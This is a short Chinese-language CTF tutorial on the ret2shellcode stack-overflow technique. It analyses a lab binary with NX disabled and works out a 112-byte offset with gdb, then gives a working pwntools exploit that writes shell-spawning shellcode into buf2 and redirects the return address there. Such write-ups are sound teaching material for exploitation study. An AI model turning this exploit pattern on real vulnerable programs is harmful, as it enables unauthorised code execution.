ret2shellcode

ret2shellcode

shellcode:在栈溢出的攻击技术中通常是要控制函数的返回地址到自己想要的地方执行自己想要执行的代码。ret2shellcode代表返回到shellcode中即控制函数的返回地址到预先设定好的shellcode区域中去执行shellcode代码，这是非常危险的。

1.保护机制

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-4UzJhYXX-1628871725391)(https://i.loli.net/2021/07/05/Wl4nVtSE2vOMgUB.png)]

发现NX关闭，那么堆栈上可以直接执行。考虑直接在栈上执行shellcode

2.ida分析

使用ida分析，发现危险函数gets()。同时，还有strncpy()函数将s字符串拷贝到buf2上。s字符串的长度为64h，buf2的长度为64h。

既然堆栈可以执行，那么考虑将shellcode写入到buf2处。然后劫持retutn，让他返回到buf2处执行shellcode

发现buf2的地址为：0x0804A080

3.exp编写

那么栈帧就是：

使用gdb调试，计算出想要淹没ebp需要的长度为：$ 0xffffd2b8 - 0xffffd24c + 4 = 112$

编写exp如下：

from pwn import *
 
io = process("pwn/ret2shellcode/ret2shellcode")
io.recv()
shellcode = asm(shellcraft.sh())
buf2 = 0x0804A080
payload = shellcode.ljust(112, b'A') + p32(buf2)
io.sendline(payload)
io.interactive()